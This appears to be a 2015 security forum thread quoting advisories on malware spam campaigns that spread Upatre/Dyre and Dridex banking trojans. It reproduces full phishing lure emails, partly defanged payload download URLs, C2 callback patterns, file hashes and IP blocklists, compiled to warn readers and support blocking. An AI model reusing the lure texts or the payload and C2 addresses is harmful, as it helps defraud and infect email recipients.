Congratulations ! You will gain a 45% rake-off for the last disposal. Please overlook the following documentation to know the whole amount you’ve won.
Everyday you convince that you are the best power of our team in the market. I am sublime and beholden to have such a clever and able sub. Continue the perfect job.
With best wishes.
Kathryn Pearson General manager
And others with similar wording... If you are unwise enough to try to open the word doc, you will see this message:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/07/total_sum_from_latest_disposition_doc.png
Do -not- follow their suggestions to enable editing or content, otherwise you will be infected...
25 February 2015: total_sum_from_latest_disposition.doc - Current Virus total detections: 4/55*
... This tries to connect to 2 web sites:
thereis.staging.nodeproduction .com/wp-content/uploads/78672738612836.txt
... which downloads an encrypted text file... and to
www .buildingwalls .co.za/wp-content/themes/corporate-10/papa.txt which gives the web address of http ://midwestlabradoodles .com/wp-content/themes/twentyeleven/qwop.exe. This file is an Upatre downloader for the typical Dyre banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https ://www.virustotal.com/en-gb/file/d58039e25fcfb0b2fd002e26ac55bb5cef7bf32c7a9063fb982f3b98bf83b463/analysis/1437049226/
** https://www.virustotal.com/en-gb/file/e2703de875caff775eddc4c970338b46daf5028d3923af38518f9c6a61fd4fbe/analysis/1437046046/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
93.185.4.90: https://www.virustotal.com/en-gb/ip-address/93.185.4.90/information/
176.36.251.208: https://www.virustotal.com/en-gb/ip-address/176.36.251.208/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
nodeproduction .com: 72.10.52.104: https://www.virustotal.com/en-gb/ip-address/72.10.52.104/information/
buildingwalls .co.za: 196.220.41.72: https://www.virustotal.com/en-gb/ip-address/196.220.41.72/information/
midwestlabradoodles .com: 72.167.131.160: https://www.virustotal.com/en-gb/ip-address/72.167.131.160/information/
- http://blog.dynamoo.com/2015/07/malware-spam-excelent-job-good.html
16 July 2015
"... Recommended blocklist:
93.185.4.90
thereis.staging.nodeproduction .com
www .buildingwalls .co.za
midwestlabradoodles .com "
___
Fake 'About your suggestions' SPAM – PDF malware
- http://myonlinesecurity.co.uk/about-your-suggestions-fake-pdf-malware/
16 July 2016 - "'About your suggestions' pretending to come from emaillambflan <emaillambflan@ totalnetwork .it> with a zip attachment is another one from the current bot runs... The email looks like:
We chatted few hours ago. We have thought about your programs how to perfect our work and financial profit. Your suggestions seem extremely inspiring and we undoubtedly want such a genius like you. We consider your plans are feasible and would like to implement them. Attached are our progression charts and processes directory. Please look through them and if you will have some questions ask about it. Also make a succinct plan thus we will confer about the elements of every step./r/n We are waiting for your reply soon !
16 July 2015: figures_and_guide.zip: Extracts to: figures_and_directory.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/8398dd57aeadd30b3bf047bef0e139a637541f7e265679b5be0f1acf861a6d91/analysis/1437056410/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
93.185.4.90: https://www.virustotal.com/en-gb/ip-address/93.185.4.90/information/
109.86.226.85: https://www.virustotal.com/en-gb/ip-address/109.86.226.85/information/
23.14.92.65: https://www.virustotal.com/en-gb/ip-address/23.14.92.65/information/
___
Sales Commission Spam
- http://threattrack.tumblr.com/post/124241257458/sales-commission-spam
July 16, 2015 - "Subjects Seen
Good achievement !
Typical e-mail details:
Congratulations ! You will win a 43% commission for the last sale. Please see the next documents to get to know the whole sum you’ve obtained.
Daily you prove that you are the best power of our team in the world of commerce. I am proud and grateful to get such a gifted and experienced worker. Go on the excelent job.
With best wishes.
Kathryn Brooks Director
Screenshot: https://41.media.tumblr.com/e31f6795e8988a9dd9fa5c18e0485950/tumblr_inline_nrl2v2FoV21r6pupn_500.png
Malicious File Name and MD5:
amount_from_last_realization.scr (1e314705c1f154d7b848fcc20bfcd5e8)
Tagged: Sales Commission, Upatre
:fear::fear: :mad:
AplusWebMaster
2015-07-17, 16:25
FYI...
Fake 'eFax' SPAM - leads to malware
- http://blog.dynamoo.com/2015/07/malware-spam-efax-message-from-unknown.html
17 July 2015 - "This -fake- fax spam leads to malware:
Screenshot: https://2.bp.blogspot.com/-a9Ay1zeHZEw/VajqgaIj7iI/AAAAAAAAGx4/UwTCBaviLSw/s1600/fake-fax.png
Although the numbers and some other details change in the spam messages, in all cases the download location has been from a legitimate but -hacked- site at:
breedandco .com/fileshare/FAX-1400166434-707348006719-154.zip
The ZIP file has a detection rate of 6/55* and it contains a malicious exeuctable named FAX-1400166434-707348006719-154.scr which has a detection rate of 4/55**. Automated analysis... shows a characterstic callback pattern that indicates Upatre (which always leads to the Dyre banking trojan):
93.185.4.90 :12325/ETK7//0/51-SP3/0/GKBIMBFDBEEE
93.185.4.90 :12325/ETK7//41/5/1/GKBIMBFDBEEE
This IP is allocated to C2NET in the Czech Republic. The malware also attempts to enumerate the IP address of the target by accessing checkip .dyndns .org which is a legitimate service. It is worth looking for traffic to that domain because it is a good indicator of compromise.
The malware reaches out to some other malicious IPs (mostly parts of a botnet):
93.185.4.90 (C2NET, Czech Republic)
62.204.250.26 (TTNET, Czech Republic)
76.84.81.120 (Time Warner Cable, US)
159.224.194.188 (Content Delivery Network Ltd, Ukraine)
178.222.250.35 (Telekom Srbija, Serbia)
181.189.152.131 (Navega.com, Guatemala)
194.28.190.84 (AgaNet Agata Goleniewska, Poland)
194.28.191.213 (AgaNet Agata Goleniewska, Poland)
199.255.132.202 (Computer Sales & Services Inc., US)
208.123.135.106 (Secom Inc, US)
Among other things, the malware drops a file XGwdKLWhYBDqWBb.exe [VT 10/55***] and vastuvut.exe [VT 6/55****].
Recommended blocklist:
93.185.4.90
62.204.250.26
76.84.81.120
159.224.194.188
178.222.250.35
181.189.152.131
194.28.190.84
194.28.191.213
199.255.132.202
208.123.135.106 "
* https://www.virustotal.com/en/file/41d2c42ac8371a14bf49c335c1b46af0993cfa2a0f210d757821808d085b9926/analysis/1437133169/
** https://www.virustotal.com/en/file/0ed3c094d49e3e9e3fa500bb937cb2543bf08d4efc8a915615545dcf1ba9d0a8/analysis/1437133178/
*** https://www.virustotal.com/en/file/af3417ac8f5770a4d7da4abfe1ab35fef72dbddb2672efc60491cf7b9a1b3941/analysis/1437135014/
**** https://www.virustotal.com/en/file/5d83962ff5e0b10050e535837c72ca97be8e748e6e0dd69b5951b2ef2e0f6d8a/analysis/1437135026/
___
Fake 'You've earned it' SPAM - malware
- http://blog.dynamoo.com/2015/07/malware-spam-youve-earned-it-youve.html
17 July 2015 - "This is another randomly-generated round of malware spam, following on from this one[1].
1] http://blog.dynamoo.com/2015/07/malware-spam-excelent-job-good.html
Date: 16 July 2015 at 12:53
Subject: Excelent job !
Congratulations ! You will obtain a 25% commission for the latest sale. Please overlook the next papers to know the whole sum you've gained.
Daily you prove that you are the main force of our branch in the sales. I am elate and beholden to have such a gifted and able employee. Proceed the good achievements.
All the best.
Michelle Curtis Company management
---------------------
Date: 16 July 2015 at 11:53
Subject: Good achievement !
Congratulations ! You will win a 40% rake-off for the latest sale. Please see the these documents to find out the entire sum you've won.
Everyday you assure that you are the head power of our group in the sales. I am sublime and beholden to get such a talented and skillful workman. Continue the good achievements.
With the best regards.
Sharon Silva Company management ...
Attached is a malicious Word document which in the two samples I saw was called
total_sum_from_last_sale.doc
total_sum_from_latest_disposition.doc
Both these documents were identical apart from the filename, and have a VirusTotal detection rate of 4/55*. Inside the document is this malicious macro... which according to Hybrid Analysis downloads several components (scripts and batch files) from:
thereis.staging .nodeproduction .com/wp-content/uploads/78672738612836.txt
www .buildingwalls .co.za/wp-content/themes/corporate-10/78672738612836.txt
www .buildingwalls .co.za/wp-content/themes/corporate-10/papa.txt
These are executed, then a malicious executable is downloaded from:
midwestlabradoodles .com/wp-content/themes/twentyeleven/qwop.exe
This has a VirusTotal detection rate of 8/55** and that report plus other automated analysis tools... phones home to the following malicious URLs:
93.185.4.90 :12317/LE2/<MACHINE_NAME>/0/51-SP3/0/MEBEFEBFEBEFJ
93.185.4.90 :12319/LE2/<MACHINE_NAME>/41/7/4/
That IP belongs to C2NET in the Czech Republic. It also sends non-malicious traffic to icanhazip.com (a legitimate site that returns the IP address) which is a good indicator of compromise.
This malware drops the Dyre banking trojan.
Recommended blocklist:
93.185.4.90
thereis .staging.nodeproduction .com
www .buildingwalls .co.za
midwestlabradoodles .com
* https://www.virustotal.com/en/file/d58039e25fcfb0b2fd002e26ac55bb5cef7bf32c7a9063fb982f3b98bf83b463/analysis/1437053265/
** https://www.virustotal.com/en/file/e2703de875caff775eddc4c970338b46daf5028d3923af38518f9c6a61fd4fbe/analysis/1437054039/
:fear::fear: :mad:
AplusWebMaster
2015-07-27, 14:59
FYI...
Fake 'copy' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/copy-word-doc-or-excel-xls-spreadsheet-malware/
27 July 2015 - "An email with a subject simply saying 'copy' pretending to come from belinda.taylor@ bssgroup .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email body simply says: copy
27 July 2015 : 13409079779.docm - Current Virus total detections: 4/56*
Downloads Dridex banking malware from:
terrasses-de-santeny .com/yffd/yfj.exe . Other versions of this downloader will download the -same- Dridex banking malware from alternative locations. So far we have seen
http ://www.madagascar-gambas .com/yffd/yfj.exe
http ://technibaie .net/yffd/yfj.exe
http ://terrasses-de-santeny .com/yffd/yfj.exe
http ://blog.storesplaisance .com/yffd/yfj.exe
http ://telechargement.storesplaisance .com/yffd/yfj.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fdf8b9d41404ba4121abf1fab7793cce1edf85f35abc4fa787040f87ccebfdc2/analysis/1437987707/
terrasses-de-santeny .com: 94.23.55.169: https://www.virustotal.com/en/ip-address/94.23.55.169/information/
madagascar-gambas .com: 'Could not find an IP address for this domain name' (May have been taken-down)
technibaie .net: 94.23.1.145: https://www.virustotal.com/en/ip-address/94.23.1.145/information/
storesplaisance .com: 94.23.1.145: FR / 16276 (OVH SAS)
___
Fake 'Order Confirmation' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/07/malware-spam-order-confirmation-ret.html
27 July 2015 - "This spam does not come from Royal Canin, but is instead a simple -forgery- with a malicious attachment:
From "[1NAV PROD RCS] " [donotreply@ royal-canin .fr]
Date Mon, 27 Jul 2015 18:49:16 +0700
Subject Order Confirmation RET-396716 Your Ref.: JL0815/1333 230715
Please find attached your Sales Order Confirmation
Note: This e-mail was sent from a notification only e-mail address that
cannot accept incoming e-mail. PLEASE DO NOT REPLY TO THIS MESSAGE.
Attached to the message is a file Order Confirmation RET-396716 230715.xml (it wasn't attached properly in the samples I saw) with a VirusTotal detection rate of 1/55*, which in turn contains a malicious macro... which downloads an executable from one of the following locations (there are probably more):
http ://www.madagascar-gambas .com/yffd/yfj.exe
http ://technibaie .net/yffd/yfj.exe
http ://blog.storesplaisance .com/yffd/yfj.exe
This is saved as %TEMP%\ihhadnic.exe, and has a detection rate of 2/55**. Automated analysis tools... show that it attempts to phone home to:
93.171.132.5 (PE Kartashev Anton Evgen'evich, Ukraine)..."
* https://www.virustotal.com/en/file/80042e9c1d0a7c40128506a7d56e32a0fab4ac149181dbbd2f28b959c263ea3e/analysis/1437999231/
** https://www.virustotal.com/en/file/c5bbeeecd49bf044049aca55ea691295692590b8fe4c461c1114aa055b6384ad/analysis/1437999249/
> http://myonlinesecurity.co.uk/order-confirmation-ret-396716-your-ref-jl08151333-230715-royal-canin-word-doc-or-excel-xls-spreadsheet-malware/
27 July 2015: Order Confirmation RET-396716 230715.xml - Current Virus total detections: 1/56*
... Which downloads an updated version of Dridex banking malware..."
* https://www.virustotal.com/en/file/80042e9c1d0a7c40128506a7d56e32a0fab4ac149181dbbd2f28b959c263ea3e/analysis/1437997926/
___
Fake 'Loan service' – PDF malware
- http://myonlinesecurity.co.uk/new-loan-service-nearby-fake-pdf-malware/
27 July 2015 - "'New Loan service nearby' with a zip attachment is another one from the current bot runs... Alternative subjects for this malspam run include: 'New Credit service near you'. The email looks like:
We are happy to inform you that we are founding a affiliate in your vicinity next week. We are credit services firm with more than 15 years practice , and several branches in the region. We give help to individuals and corporations in profiting money for the objective. We provide all the acts , consisting of bringing the money source that sets the lowest percentage and the best conditions of pays , all the paperwork , and etc.
We are enclosing the invite ticket for the opening celebration and service’s accommodation schedule. Wish to see you on our opening.
Give us a chance to maintain you!
Thanks,
Truly yours,
Mike Ward General management Info
-Or-
We are happy to announce you that we are opening a branch in your area soon. We are loan accommodations firm with more than 25 years workmanship, and several offices in the region.
We provide help to ordinary people and corporations in availing money for the objective.
We ensure all the actions, consisting of bringing the fiscal source that offers the lowest commissions and the best terms of payment, all the papers, and so on.
We are applying the engagement card for the opening and organization’s accommodation schedule. Hope to see you on that day.
Give us a chance to serve you!
Thanking you,
Yours truly,
Mike Ward General management Superior
And the usual other variety of computer bot generated wording that doesn’t quite read as proper English.
27 July 2015: invitation_and_accommodations.zip: Extracts to: call_and_accommodations.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8f76dd3e022ecc7d946393d6838b659f29d988d6a24c547c8f2b33e14508e7fd/analysis/1438000007/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
173.248.31.6: https://www.virustotal.com/en/ip-address/173.248.31.6/information/
2.18.213.48: https://www.virustotal.com/en/ip-address/2.18.213.48/information/
:fear::fear: :mad: